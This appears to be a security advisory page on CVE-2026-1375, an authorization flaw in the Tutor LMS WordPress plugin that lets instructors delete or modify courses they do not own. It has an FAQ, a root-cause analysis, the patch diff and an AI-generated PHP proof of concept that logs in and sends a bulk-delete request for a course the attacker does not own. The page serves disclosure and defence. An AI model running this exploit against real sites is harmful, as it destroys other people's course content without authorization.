What is CVE-2026-1375?

CVE-2026-1375 is a high-severity vulnerability affecting the Tutor LMS WordPress plugin, specifically versions up to and including 3.9.5. It is classified as an Insecure Direct Object Reference (IDOR) vulnerability that allows authenticated users with Instructor-level access to modify or delete courses they do not own.

How does the vulnerability work?

The vulnerability occurs due to missing object-level authorization checks in several bulk action functions within the Tutor LMS plugin. Authenticated users can manipulate course IDs in bulk action requests, allowing them to perform actions like deletion or modification on courses they do not own.

Who is affected by this vulnerability?

Any WordPress site using Tutor LMS version 3.9.5 or earlier is at risk, particularly those that grant Instructor-level permissions to multiple users. This increases the attack surface, as any instructor can potentially exploit the vulnerability.

How can I check if my site is affected?

To determine if your site is affected, check the version of the Tutor LMS plugin installed on your WordPress site. If it is version 3.9.5 or earlier, your site is vulnerable and should be updated immediately.

How can I fix or mitigate this vulnerability?

The vulnerability is patched in Tutor LMS version 3.9.6. To fix the issue, update the plugin to the latest version. Additionally, review user permissions to limit access to the Instructor role where possible.

What does the CVSS score of 8.1 indicate?

A CVSS score of 8.1 indicates a high severity level, suggesting that the vulnerability poses a significant risk to the confidentiality, integrity, and availability of course data. It is crucial to address such vulnerabilities promptly to protect your site.

What practical risks does this vulnerability pose?

Successful exploitation of this vulnerability can lead to unauthorized deletion or modification of courses, resulting in loss of educational content, disruption of services, and potential reputational damage to the institution or organization.

What is an Insecure Direct Object Reference (IDOR)?

An Insecure Direct Object Reference (IDOR) occurs when an application exposes a reference to an internal object, allowing attackers to access or manipulate objects they should not have access to. This can lead to unauthorized actions and data breaches.

How does the proof of concept demonstrate the issue?

The proof of concept outlines a method where an authenticated user can send a crafted request to the Tutor LMS plugin, manipulating course IDs to perform unauthorized actions. This illustrates how easily the vulnerability can be exploited by an attacker with minimal technical skills.

What are the best practices to prevent similar vulnerabilities?

To prevent similar vulnerabilities, ensure that all user inputs are validated and that proper authorization checks are in place for all actions. Regularly update plugins and themes, conduct security audits, and limit user permissions to the least privilege necessary.

Is it safe to continue using Tutor LMS if I update to the patched version?

Yes, if you update to Tutor LMS version 3.9.6 or later, the vulnerability will be mitigated. However, it is advisable to continuously monitor for any new vulnerabilities and apply security best practices to maintain a secure environment.

Where can I find more information about this vulnerability?

More information about CVE-2026-1375 can be found in the official CVE database, security advisories from the plugin authors, and security-focused blogs that analyze vulnerabilities in WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1375: Tutor LMS <= 3.9.5 – Insecure Direct Object Reference to Authenticated (Instructor+) Arbitrary Course Modification and Deletion (tutor)

CVE ID CVE-2026-1375

Plugin tutor

Severity High (CVSS 8.1)

CWE 639

Vulnerable Version 3.9.5

Patched Version 3.9.6

Disclosed February 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1375:
This vulnerability is an Insecure Direct Object Reference (IDOR) in the Tutor LMS WordPress plugin affecting versions up to and including 3.9.5. The vulnerability allows authenticated attackers with Tutor Instructor-level permissions or higher to modify or delete arbitrary courses they do not own. The issue stems from missing object-level authorization checks in bulk action functions, leading to unauthorized course manipulation.

Atomic Edge research identifies the root cause in the `course_list_bulk_action()` function within `/tutor/classes/Course_List.php`. The function processes bulk actions for courses but lacks verification that the submitted course IDs belong to the current user. Specifically, lines 291-302 in the vulnerable version check only for user capabilities (`edit_tutor_course`) and site-wide publishing permissions (`instructor_can_publish_course`), but never validate ownership of the courses referenced in the `$bulk_ids` parameter. This allows instructors to submit arbitrary course IDs they do not own.

The exploitation method requires an authenticated attacker with Tutor Instructor privileges. The attacker sends a POST request to the WordPress admin-ajax.php endpoint with the action parameter set to `tutor_course_list_bulk_action`. The request includes a `bulk_action` parameter (such as `delete` or `publish`) and a `bulk_ids` parameter containing comma-separated course IDs that the attacker does not own. The plugin processes these IDs without ownership verification, executing the requested bulk action on unauthorized courses.

The patch adds authorization checks in the `course_list_bulk_action()` function. Lines 290-321 in the patched version introduce a new validation step: after capability checks, the function explodes the `$bulk_ids` string into an array, filters it using `tutor_utils()->is_instructor_of_this_course()` to retain only courses owned by the current user, then re-implodes the filtered array. This ensures instructors can only perform bulk actions on their own courses. The fix maintains existing capability checks while adding the missing ownership verification.

Successful exploitation allows attackers to delete or modify any course on the platform, regardless of ownership. This can lead to complete course takedowns, unauthorized content changes, or disruption of the learning platform. While the vulnerability requires Instructor-level access, many Tutor LMS implementations grant this role to multiple users, increasing the attack surface. The CVSS 8.1 score reflects the high impact on confidentiality, integrity, and availability of course data.

Differential between vulnerable and patched code

Code Diff

--- a/tutor/classes/Course.php
+++ b/tutor/classes/Course.php
@@ -1174,6 +1174,19 @@
 			delete_post_meta( $course_id, '_elementor_edit_mode' );
 		} elseif ( 'droip' === $builder ) {
 			delete_post_meta( $course_id, 'droip_editor_mode' );
+		} elseif ( 'divi' === $builder ) {
+			$old_post_content     = get_post_meta( $course_id, '_et_pb_old_content', true );
+			$course               = get_post( $course_id );
+			$course->post_content = $old_post_content;
+			$result               = wp_update_post( $course );
+
+			if ( $result && ! is_wp_error( $result ) ) {
+				update_post_meta( $course_id, '_et_pb_use_builder', 'off' );
+				update_post_meta( $course_id, '_et_pb_old_content', '' );
+				delete_post_meta( $course_id, '_et_dynamic_cached_shortcodes' );
+				delete_post_meta( $course_id, '_et_dynamic_cached_attributes' );
+				delete_post_meta( $course_id, '_et_builder_module_features_cache' );
+			}
 		}

 		$this->json_response(
--- a/tutor/classes/Course_List.php
+++ b/tutor/classes/Course_List.php
@@ -273,7 +273,6 @@
 		$the_query = self::course_list_query( $args, $user_id, $status );

 		return ! is_null( $the_query ) && isset( $the_query->found_posts ) ? $the_query->found_posts : $the_query;
-
 	}

 	/**
@@ -291,6 +290,8 @@

 		// Check if user is privileged.
 		if ( ! current_user_can( 'administrator' ) ) {
+			$course_ids = explode( ',', $bulk_ids );
+
 			if ( current_user_can( 'edit_tutor_course' ) ) {
 				$can_publish_course = tutor_utils()->get_option( 'instructor_can_publish_course' );

@@ -300,6 +301,17 @@
 			} else {
 				wp_send_json_error( tutor_utils()->error_message() );
 			}
+
+			// Check if the course ids are instructors own course.
+			$course_ids = array_filter(
+				$course_ids,
+				function ( $course_id ) {
+					return tutor_utils()->is_instructor_of_this_course( get_current_user_id(), $course_id );
+				}
+			);
+
+			$bulk_ids = implode( ',', $course_ids );
+
 		}

 		if ( '' === $action || '' === $bulk_ids ) {
--- a/tutor/classes/User.php
+++ b/tutor/classes/User.php
@@ -375,10 +375,11 @@
 		$_tutor_profile_bio       = Input::post( self::PROFILE_BIO_META, '', Input::TYPE_KSES_POST );
 		$_tutor_profile_image     = Input::post( self::PROFILE_PHOTO_META, '', Input::TYPE_KSES_POST );

+		// Check if the image uploaded is by the same user.
 		if ( is_numeric( $_tutor_profile_image ) ) {
 			$attachment = get_post( $_tutor_profile_image );
-
-			if ( 'attachment' === $attachment->post_type && $user_id !== $attachment->post_author ) {
+			$author_id  = (int) $attachment->post_author ?? 0;
+			if ( 'attachment' === $attachment->post_type && $user_id !== $author_id ) {
 				return;
 			}
 		}
--- a/tutor/ecommerce/CouponController.php
+++ b/tutor/ecommerce/CouponController.php
@@ -659,6 +659,8 @@
 			$this->json_response( tutor_utils()->error_message( 'nonce' ), null, HttpHelper::STATUS_BAD_REQUEST );
 		}

+		tutor_utils()->check_current_user_capability();
+
 		$coupon_id = Input::post( 'id' );

 		if ( empty( $coupon_id ) ) {
--- a/tutor/ecommerce/currency.php
+++ b/tutor/ecommerce/currency.php
@@ -856,6 +856,13 @@
 				'numeric_code' => 643,
 			),
 			array(
+				'code'         => 'RWF',
+				'symbol'       => 'FRw',
+				'name'         => 'Rwandan Franc',
+				'locale'       => 'rw-rw',
+				'numeric_code' => 646,
+			),
+			array(
 				'code'         => 'SAR',
 				'symbol'       => 'SAR',
 				'name'         => 'Saudi Riyal',
--- a/tutor/includes/droip/backend/Ajax.php
+++ b/tutor/includes/droip/backend/Ajax.php
@@ -73,6 +73,13 @@
 		if ( 'add_to_cart_course' === $request_method ) {
 			$course_id = Input::post( 'course_id' );
 			$res       = tutor_add_to_cart( $course_id );
+
+			// check is user logged in or not
+			if (! is_user_logged_in() ) {
+				$res['redirect'] = true;
+				$res['data'] = wp_login_url( wp_get_referer() );
+			}
+
 			wp_send_json_success( $res );
 		}

--- a/tutor/includes/droip/backend/ElementGenerator/ActionsGenerator.php
+++ b/tutor/includes/droip/backend/ElementGenerator/ActionsGenerator.php
@@ -231,13 +231,13 @@
 			case 'membership_btn': {
 					$pricing_page = Settings::get_pricing_page_url();
 					if ($pricing_page) {
-						if (is_user_logged_in()) {
-							$extra_attributes .= " data-pricing_url='" . $pricing_page . "'";
-						} else {
-							$login_url = wp_login_url(wp_get_referer());
+						$extra_attributes .= " data-pricing_url='" . $pricing_page . "'";
+						// if (is_user_logged_in()) { // removed to always direct to pricing page
+						// } else {
+						// 	$login_url = wp_login_url(wp_get_referer());

-							$extra_attributes .= " data-login_url='" . $login_url . "'";
-						}
+						// 	$extra_attributes .= " data-login_url='" . $login_url . "'";
+						// }

 						return $this->generate_child_element_with_parent_droip_data($extra_attributes);
 					}
--- a/tutor/includes/droip/backend/Hooks.php
+++ b/tutor/includes/droip/backend/Hooks.php
@@ -47,6 +47,105 @@
         add_filter('droip_external_collection_options', [$this, 'modify_external_collection_options'], 10, 2);
         add_filter('droip_external_collection_item_type', [$this, 'get_tutor_item_types'], 10, 2);
         add_filter('droip_element_generator_radio-button', [$this, 'droip_element_generator_radio_buttons'], 10, 2);
+
+        add_filter('droip_import_should_create_page', [$this, 'droip_import_should_create_page'], 10, 2);
+        add_action('droip_import_page_created', [$this, 'droip_import_page_created'], 10, 2);
+
+        // $show = apply_filters('droip_show_custom_section_' . $type, true);
+        add_filter('droip_show_custom_section_header', [$this, 'show_droip_header'], 10, 1);
+        add_filter('droip_show_custom_section_footer', [$this, 'show_droip_footer'], 10, 1);
+    }
+
+    public function show_droip_header($show)
+    {
+        $is_frontend_builder = tutor_utils()->is_tutor_frontend_dashboard( 'create-course' );
+        if ( $is_frontend_builder ) {
+            $show = false;
+        }
+        if( $this->if_spotlight_mode_for_learning_page_enabled() ) {
+            $show = false;
+        }
+        return $show;
+    }
+
+    public function show_droip_footer($show)
+    {
+        $is_frontend_builder = tutor_utils()->is_tutor_frontend_dashboard( 'create-course' );
+        if ( $is_frontend_builder ) {
+            $show = false;
+        }
+        if( $this->if_spotlight_mode_for_learning_page_enabled() ) {
+            $show = false;
+        }
+        return $show;
+    }
+
+    private function if_spotlight_mode_for_learning_page_enabled(){
+        global $wp_query;
+        if($wp_query->is_single && ! empty( $wp_query->query_vars['post_type'] ) &&  in_array( $wp_query->query_vars['post_type'], ['lesson', 'tutor_quiz', 'tutor_assignments', 'tutor-google-meet', 'tutor_zoom_meeting'])  ) {
+            $enable_spotlight_mode = tutor_utils()->get_option( 'enable_spotlight_mode' );
+            if ( $enable_spotlight_mode ) {
+                return true;
+            }
+        }
+
+        return false;
+    }
+
+    public function droip_import_should_create_page($flag, $old_page_data)
+    {
+        if ($old_page_data['post_type'] === 'page') {
+            $page_slug = $old_page_data['post_name'];
+            if(in_array($page_slug, ['instructor-registration', 'student-registration'])){
+                return false;
+            }
+            if($page_slug === 'cart' && get_post(CartController::get_page_id())){
+                return false;
+            }
+            if($page_slug === 'checkout' && get_post(CheckoutController::get_page_id())){
+                return false;
+            }
+
+            $dashboard_page_id = (int) tutor_utils()->dashboard_page_id();
+            if($page_slug === 'dashboard' && get_post($dashboard_page_id)){
+                return false;
+            }
+
+            $certificate_page_id = (int) tutor_utils()->get_option('tutor_certificate_page');
+            if($page_slug === 'tutor-certificate' && get_post($certificate_page_id)){
+                return false;
+            }
+
+            $membership_page_id = (int) tutor_utils()->get_option('membership_pricing_page_id');
+            if($page_slug === 'membership-pricing' && get_post($membership_page_id)){
+                return false;
+            }
+        }
+
+        return $flag;
+    }
+
+    public function droip_import_page_created($new_page_id, $old_page_data)
+    {
+        // Clear Tutor LMS Cache after importing a page
+        if ($old_page_data['post_type'] === 'page') {
+            $page_slug = $old_page_data['post_name'];
+            if($page_slug === 'cart'){
+                tutor_utils()->update_option( CartController::PAGE_ID_OPTION_NAME, $new_page_id );
+            }
+            if($page_slug === 'checkout'){
+                tutor_utils()->update_option( CheckoutController::PAGE_ID_OPTION_NAME, $new_page_id );
+            }
+            if($page_slug === 'dashboard'){
+                tutor_utils()->update_option( 'tutor_dashboard_page_id', $new_page_id );
+            }
+            if($page_slug === 'tutor-certificate'){
+                tutor_utils()->update_option( 'tutor_certificate_page', $new_page_id );
+            }
+            if($page_slug === 'membership-pricing'){
+                tutor_utils()->update_option( 'membership_pricing_page_id', $new_page_id );
+            }
+        }
     }

     public function modify_droip_dynamic_content_fields($fields, $collection_data)
@@ -646,13 +745,15 @@
                     $plan_id = false;
                     $url = '#';

-                    if (isset($args['options'], $args['options']['membership-plan'])) {
+                    if (is_user_logged_in() && isset($args['options'], $args['options']['membership-plan'])) {
                         $plan_id = $args['options']['membership-plan']->id;
                         $checkout_link = CheckoutController::get_page_url();

                         if ($checkout_link) {
                             $url = add_query_arg('plan', $plan_id, $checkout_link);
                         }
+                    } else if (!is_user_logged_in()) {
+                        $url = wp_login_url(wp_get_referer());
                     }

                     return $url;
--- a/tutor/includes/droip/backend/VisibilityCondition.php
+++ b/tutor/includes/droip/backend/VisibilityCondition.php
@@ -34,11 +34,11 @@
 			switch ($type) {
 				case 'courses': {
 						$conditions = self::get_course_type_conditions($conditions);
+						$conditions = self::get_lms_setting_type_conditions($conditions);
 						break;
 					}
 			}

-			$conditions = self::get_lms_setting_type_conditions($conditions);
 		} elseif ($collectionType === 'user') {
 			switch ($type) {
 				case 'courses': {
@@ -621,7 +621,123 @@
 						'value'         => 'is_membership_only_mode_enabled',
 						'title'         => 'Membership-Only Mode',
 						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_spotlight_mode',
+						'title' => 'Spotlight Mode Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'     => 'display_course_instructors',
+						'title' => 'Instructor Info Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'     => 'enable_wishlist',
+						'title' => 'Wishlist Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'     => 'enable_q_and_a_on_course',
+						'title' => 'Q&A Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_author',
+						'title' => 'Author Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_level',
+						'title' => 'Level Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_share',
+						'title' => 'Social Share Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_duration',
+						'title' => 'Duration Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_total_enrolled',
+						'title' => 'Total Enrolled Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_update_date',
+						'title' => 'Update Date Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_progress_bar',
+						'title' => 'Progress Bar Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_material',
+						'title' => 'Show Material Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_about',
+						'title' => 'About Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_description',
+						'title' => 'Description Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_benefits',
+						'title' => 'Course Benefits Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_requirements',
+						'title' => 'Requirements Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_target_audience',
+						'title' => 'Target Audience Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_announcements',
+						'title' => 'Announcements Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_review',
+						'title' => 'Review Enabled',
+						'operator_type' => 'boolean_operators',
 					)
+
 				)
 			),
 		);
@@ -839,14 +955,36 @@
 	{
 		switch ($field) {
 			case 'is_membership_only_mode_enabled': {
-					$is_membership_only_mode_enabled = apply_filters('tutor_membership_only_mode', false);
-					return $is_membership_only_mode_enabled;
-				}
+				$is_membership_only_mode_enabled = apply_filters('tutor_membership_only_mode', false);
+				return $is_membership_only_mode_enabled;
+			}
+
+			case 'enable_spotlight_mode':
+			case 'display_course_instructors':
+			case 'enable_wishlist':
+			case 'enable_q_and_a_on_course':
+			case 'enable_course_author':
+			case 'enable_course_level':
+			case 'enable_course_share':
+			case 'enable_course_duration':
+			case 'enable_course_total_enrolled':
+			case 'enable_course_update_date':
+			case 'enable_course_progress_bar':
+			case 'enable_course_material':
+			case 'enable_course_about':
+			case 'enable_course_description':
+			case 'enable_course_benefits':
+			case 'enable_course_requirements':
+			case 'enable_course_target_audience':
+			case 'enable_course_announcements':
+			case 'enable_course_review': {
+				$is_enabled = tutor_utils()->get_option($field, false);
+				return $is_enabled;
+			}

 			default: {
-					return null;
-				}
+				return false;
+			}
 		}
-		return null;
 	}
 }
 No newline at end of file
--- a/tutor/tutor.php
+++ b/tutor/tutor.php
@@ -4,11 +4,11 @@
  * Plugin URI: https://tutorlms.com
  * Description: Tutor is a complete solution for creating a Learning Management System in WordPress way. It can help you to create small to large scale online education site very conveniently. Power features like report, certificate, course preview, private file sharing make Tutor a robust plugin for any educational institutes.
  * Author: Themeum
- * Version: 3.9.5
+ * Version: 3.9.6
  * Author URI: https://themeum.com
  * Requires PHP: 7.4
  * Requires at least: 5.3
- * Tested up to: 6.8
+ * Tested up to: 6.9
  * License: GPLv2 or later
  * Text Domain: tutor
  *
@@ -26,7 +26,7 @@
  *
  * @since 1.0.0
  */
-define( 'TUTOR_VERSION', '3.9.5' );
+define( 'TUTOR_VERSION', '3.9.6' );
 define( 'TUTOR_FILE', __FILE__ );

 /**
--- a/tutor/vendor/composer/installed.php
+++ b/tutor/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => 'themeum/tutor',
         'pretty_version' => 'dev-master',
         'version' => 'dev-master',
-        'reference' => 'ad35941bc49eab600939a865a136e4a05cf217f8',
+        'reference' => '11d7e23fa5b4dbc33a21b43c6a3458484fd24999',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -13,7 +13,7 @@
         'themeum/tutor' => array(
             'pretty_version' => 'dev-master',
             'version' => 'dev-master',
-            'reference' => 'ad35941bc49eab600939a865a136e4a05cf217f8',
+            'reference' => '11d7e23fa5b4dbc33a21b43c6a3458484fd24999',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1375 - Tutor LMS <= 3.9.5 - Insecure Direct Object Reference to Authenticated (Instructor+) Arbitrary Course Modification and Deletion

<?php

$target_url = 'https://vulnerable-site.com';
$username = 'attacker_instructor';
$password = 'attacker_password';
$victim_course_id = 123; // ID of course not owned by attacker

// Initialize session
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// Step 1: Authenticate as Tutor Instructor
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);

// Step 2: Extract nonce from Tutor course list page
$course_list_url = $target_url . '/wp-admin/admin.php?page=tutor';
curl_setopt($ch, CURLOPT_URL, $course_list_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce (simplified - actual implementation would parse HTML)
// Tutor typically uses 'tutor_nonce' parameter for AJAX requests
$nonce = 'tutor_nonce_value'; // Would be extracted from page source

// Step 3: Exploit IDOR via bulk delete action
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_data = array(
    'action' => 'tutor_course_list_bulk_action',
    'bulk_action' => 'delete',
    'bulk_ids' => $victim_course_id, // Single course ID attacker doesn't own
    '_tutor_nonce' => $nonce
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$response = curl_exec($ch);

echo "Exploit Response:n";
echo $response;

// Step 4: Verify deletion by attempting to access course
$course_url = $target_url . '/?p=' . $victim_course_id;
curl_setopt($ch, CURLOPT_URL, $course_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

if (strpos($response, '404') !== false || strpos($response, 'not found') !== false) {
    echo "n[SUCCESS] Course $victim_course_id appears to be deletedn";
} else {
    echo "n[INFO] Course status verification inconclusiven";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-1375?
Overview of the vulnerability
CVE-2026-1375 is a high-severity vulnerability affecting the Tutor LMS WordPress plugin, specifically versions up to and including 3.9.5. It is classified as an Insecure Direct Object Reference (IDOR) vulnerability that allows authenticated users with Instructor-level access to modify or delete courses they do not own.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs due to missing object-level authorization checks in several bulk action functions within the Tutor LMS plugin. Authenticated users can manipulate course IDs in bulk action requests, allowing them to perform actions like deletion or modification on courses they do not own.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using Tutor LMS version 3.9.5 or earlier is at risk, particularly those that grant Instructor-level permissions to multiple users. This increases the attack surface, as any instructor can potentially exploit the vulnerability.
How can I check if my site is affected?
Verifying plugin version
To determine if your site is affected, check the version of the Tutor LMS plugin installed on your WordPress site. If it is version 3.9.5 or earlier, your site is vulnerable and should be updated immediately.
How can I fix or mitigate this vulnerability?
Steps to secure your site
The vulnerability is patched in Tutor LMS version 3.9.6. To fix the issue, update the plugin to the latest version. Additionally, review user permissions to limit access to the Instructor role where possible.
What does the CVSS score of 8.1 indicate?
Understanding risk levels
A CVSS score of 8.1 indicates a high severity level, suggesting that the vulnerability poses a significant risk to the confidentiality, integrity, and availability of course data. It is crucial to address such vulnerabilities promptly to protect your site.
What practical risks does this vulnerability pose?
Potential impact on your site
Successful exploitation of this vulnerability can lead to unauthorized deletion or modification of courses, resulting in loss of educational content, disruption of services, and potential reputational damage to the institution or organization.
What is an Insecure Direct Object Reference (IDOR)?
Definition and implications
An Insecure Direct Object Reference (IDOR) occurs when an application exposes a reference to an internal object, allowing attackers to access or manipulate objects they should not have access to. This can lead to unauthorized actions and data breaches.
How does the proof of concept demonstrate the issue?
Understanding the exploitation process
The proof of concept outlines a method where an authenticated user can send a crafted request to the Tutor LMS plugin, manipulating course IDs to perform unauthorized actions. This illustrates how easily the vulnerability can be exploited by an attacker with minimal technical skills.
What are the best practices to prevent similar vulnerabilities?
Enhancing security measures
To prevent similar vulnerabilities, ensure that all user inputs are validated and that proper authorization checks are in place for all actions. Regularly update plugins and themes, conduct security audits, and limit user permissions to the least privilege necessary.
Is it safe to continue using Tutor LMS if I update to the patched version?
Post-update considerations
Yes, if you update to Tutor LMS version 3.9.6 or later, the vulnerability will be mitigated. However, it is advisable to continuously monitor for any new vulnerabilities and apply security best practices to maintain a secure environment.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-1375 can be found in the official CVE database, security advisories from the plugin authors, and security-focused blogs that analyze vulnerabilities in WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations